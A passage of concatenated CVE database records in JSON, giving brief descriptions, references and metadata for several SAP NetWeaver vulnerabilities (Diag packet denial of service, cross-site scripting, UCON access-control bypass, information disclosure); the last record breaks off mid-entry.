2012-05-15 01:00
Modified
2024-08-06 19:34
Severity ?
EPSS score ?
Summary
The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
| ▼ | URL | Tags |
|---|---|---|
| https://service.sap.com/sap/support/notes/1687910 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities | x_refsource_MISC | |
| http://www.securitytracker.com/id?1027052 | vdb-entry, x_refsource_SECTRACK | |
| https://exchange.xforce.ibmcloud.com/vulnerabilities/75453 | vdb-entry, x_refsource_XF |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:34:25.846Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027052"
},
{
"name": "netweaver-diagtraceatoms-dos(75453)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75453"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-05-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027052"
},
{
"name": "netweaver-diagtraceatoms-dos(75453)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75453"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-2511",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The DiagTraceAtoms function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://service.sap.com/sap/support/notes/1687910",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027052"
},
{
"name": "netweaver-diagtraceatoms-dos(75453)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75453"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-2511",
"datePublished": "2012-05-15T01:00:00",
"dateReserved": "2012-05-07T00:00:00",
"dateUpdated": "2024-08-06T19:34:25.846Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-2512
Vulnerability from cvelistv5
Published
2012-05-15 01:00
Modified
2024-08-06 19:34
Severity ?
EPSS score ?
Summary
The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.
References
| ▼ | URL | Tags |
|---|---|---|
| https://exchange.xforce.ibmcloud.com/vulnerabilities/75454 | vdb-entry, x_refsource_XF | |
| https://service.sap.com/sap/support/notes/1687910 | x_refsource_MISC | |
| http://scn.sap.com/docs/DOC-8218 | x_refsource_CONFIRM | |
| http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities | x_refsource_MISC | |
| http://www.securitytracker.com/id?1027052 | vdb-entry, x_refsource_SECTRACK |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T19:34:25.809Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "netweaver-diagtracestream-dos(75454)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75454"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id?1027052"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2012-05-08T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-08-28T12:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "netweaver-diagtracestream-dos(75454)",
"tags": [
"vdb-entry",
"x_refsource_XF"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75454"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK"
],
"url": "http://www.securitytracker.com/id?1027052"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-2512",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "netweaver-diagtracestream-dos(75454)",
"refsource": "XF",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75454"
},
{
"name": "https://service.sap.com/sap/support/notes/1687910",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"name": "http://scn.sap.com/docs/DOC-8218",
"refsource": "CONFIRM",
"url": "http://scn.sap.com/docs/DOC-8218"
},
{
"name": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"name": "1027052",
"refsource": "SECTRACK",
"url": "http://www.securitytracker.com/id?1027052"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-2512",
"datePublished": "2012-05-15T01:00:00",
"dateReserved": "2012-05-07T00:00:00",
"dateUpdated": "2024-08-06T19:34:25.809Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-1290
Vulnerability from cvelistv5
Published
2012-02-23 18:00
Modified
2024-09-17 03:23
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/52101 | vdb-entry, x_refsource_BID | |
| http://dsecrg.com/pages/vul/show.php?id=414 | x_refsource_MISC | |
| http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a | x_refsource_CONFIRM | |
| https://service.sap.com/sap/support/notes/1583300 | x_refsource_MISC | |
| http://secunia.com/advisories/47861 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:53:37.190Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "52101",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/52101"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1583300"
},
{
"name": "47861",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/47861"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-02-23T18:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "52101",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/52101"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1583300"
},
{
"name": "47861",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/47861"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-1290",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in b2b/auction/container.jsp in the Internet Sales (crm.b2b) module in SAP NetWeaver 7.0 allows remote attackers to inject arbitrary web script or HTML via the _loadPage parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "52101",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"name": "http://dsecrg.com/pages/vul/show.php?id=414",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=414"
},
{
"name": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a",
"refsource": "CONFIRM",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"name": "https://service.sap.com/sap/support/notes/1583300",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1583300"
},
{
"name": "47861",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/47861"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-1290",
"datePublished": "2012-02-23T18:00:00Z",
"dateReserved": "2012-02-23T00:00:00Z",
"dateUpdated": "2024-09-17T03:23:08.872Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2016-3635
Vulnerability from cvelistv5
Published
2016-10-13 14:00
Modified
2024-08-06 00:03
Severity ?
EPSS score ?
Summary
SAP Netweaver 7.4 allows remote authenticated users to bypass an intended Unified Connectivity (UCON) access control list and execute arbitrary Remote Function Modules (RFM) by leveraging a connection created from earlier execution of an anonymous RFM included in a Communication Assembly, aka SAP Security Note 2139366.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/93501 | vdb-entry, x_refsource_BID | |
| https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass | x_refsource_MISC | |
| http://seclists.org/fulldisclosure/2016/Oct/48 | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T00:03:34.369Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "93501",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/93501"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass"
},
{
"name": "20161011 Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/48"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-10-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "SAP Netweaver 7.4 allows remote authenticated users to bypass an intended Unified Connectivity (UCON) access control list and execute arbitrary Remote Function Modules (RFM) by leveraging a connection created from earlier execution of an anonymous RFM included in a Communication Assembly, aka SAP Security Note 2139366."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-11-25T19:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "93501",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/93501"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass"
},
{
"name": "20161011 Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Oct/48"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-3635",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "SAP Netweaver 7.4 allows remote authenticated users to bypass an intended Unified Connectivity (UCON) access control list and execute arbitrary Remote Function Modules (RFM) by leveraging a connection created from earlier execution of an anonymous RFM included in a Communication Assembly, aka SAP Security Note 2139366."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "93501",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/93501"
},
{
"name": "https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass",
"refsource": "MISC",
"url": "https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass"
},
{
"name": "20161011 Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Oct/48"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-3635",
"datePublished": "2016-10-13T14:00:00",
"dateReserved": "2016-03-22T00:00:00",
"dateUpdated": "2024-08-06T00:03:34.369Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2010-1609
Vulnerability from cvelistv5
Published
2010-04-29 17:00
Modified
2024-08-07 01:28
Severity ?
EPSS score ?
Summary
Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.vupen.com/english/advisories/2010/0397 | vdb-entry, x_refsource_VUPEN | |
| http://www.securityfocus.com/archive/1/509499/100/0/threaded | mailing-list, x_refsource_BUGTRAQ | |
| http://secunia.com/advisories/38629 | third-party-advisory, x_refsource_SECUNIA | |
| http://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html | mailing-list, x_refsource_FULLDISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-07T01:28:43.185Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "ADV-2010-0397",
"tags": [
"vdb-entry",
"x_refsource_VUPEN",
"x_transferred"
],
"url": "http://www.vupen.com/english/advisories/2010/0397"
},
{
"name": "20100211 [Onapsis Security Advisory 2010-003] SAP WebDynpro Runtime XSS/CSS Injection",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/509499/100/0/threaded"
},
{
"name": "38629",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/38629"
},
{
"name": "20100211 [Onapsis Security Advisory 2010-003] SAP WebDynpro Runtime XSS/CSS Injection",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2010-02-11T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-10T18:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "ADV-2010-0397",
"tags": [
"vdb-entry",
"x_refsource_VUPEN"
],
"url": "http://www.vupen.com/english/advisories/2010/0397"
},
{
"name": "20100211 [Onapsis Security Advisory 2010-003] SAP WebDynpro Runtime XSS/CSS Injection",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/509499/100/0/threaded"
},
{
"name": "38629",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/38629"
},
{
"name": "20100211 [Onapsis Security Advisory 2010-003] SAP WebDynpro Runtime XSS/CSS Injection",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2010-1609",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Cross-site scripting (XSS) vulnerability in SAP NetWeaver 2004 before SP21 and 2004s before SP13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "ADV-2010-0397",
"refsource": "VUPEN",
"url": "http://www.vupen.com/english/advisories/2010/0397"
},
{
"name": "20100211 [Onapsis Security Advisory 2010-003] SAP WebDynpro Runtime XSS/CSS Injection",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/509499/100/0/threaded"
},
{
"name": "38629",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/38629"
},
{
"name": "20100211 [Onapsis Security Advisory 2010-003] SAP WebDynpro Runtime XSS/CSS Injection",
"refsource": "FULLDISC",
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-02/0216.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2010-1609",
"datePublished": "2010-04-29T17:00:00",
"dateReserved": "2010-04-29T00:00:00",
"dateUpdated": "2024-08-07T01:28:43.185Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2012-1292
Vulnerability from cvelistv5
Published
2012-02-23 18:00
Modified
2024-09-16 22:41
Severity ?
EPSS score ?
Summary
Unspecified vulnerability in the MessagingSystem servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the MessagingSystem Performance Data via unspecified vectors.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/52101 | vdb-entry, x_refsource_BID | |
| https://service.sap.com/sap/support/notes/1585527 | x_refsource_MISC | |
| http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a | x_refsource_CONFIRM | |
| http://dsecrg.com/pages/vul/show.php?id=416 | x_refsource_MISC | |
| http://secunia.com/advisories/47861 | third-party-advisory, x_refsource_SECUNIA |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T18:53:36.941Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "52101",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/52101"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"name": "47861",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA",
"x_transferred"
],
"url": "http://secunia.com/advisories/47861"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Unspecified vulnerability in the MessagingSystem servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the MessagingSystem Performance Data via unspecified vectors."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2012-02-23T18:00:00Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "52101",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/52101"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"name": "47861",
"tags": [
"third-party-advisory",
"x_refsource_SECUNIA"
],
"url": "http://secunia.com/advisories/47861"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2012-1292",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Unspecified vulnerability in the MessagingSystem servlet in SAP NetWeaver 7.0 allows remote attackers to obtain sensitive information about the MessagingSystem Performance Data via unspecified vectors."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "52101",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/52101"
},
{
"name": "https://service.sap.com/sap/support/notes/1585527",
"refsource": "MISC",
"url": "https://service.sap.com/sap/support/notes/1585527"
},
{
"name": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a",
"refsource": "CONFIRM",
"url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a"
},
{
"name": "http://dsecrg.com/pages/vul/show.php?id=416",
"refsource": "MISC",
"url": "http://dsecrg.com/pages/vul/show.php?id=416"
},
{
"name": "47861",
"refsource": "SECUNIA",
"url": "http://secunia.com/advisories/47861"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2012-1292",
"datePublished": "2012-02-23T18:00:00Z",
"dateReserved": "2012-02-23T00:00:00Z",
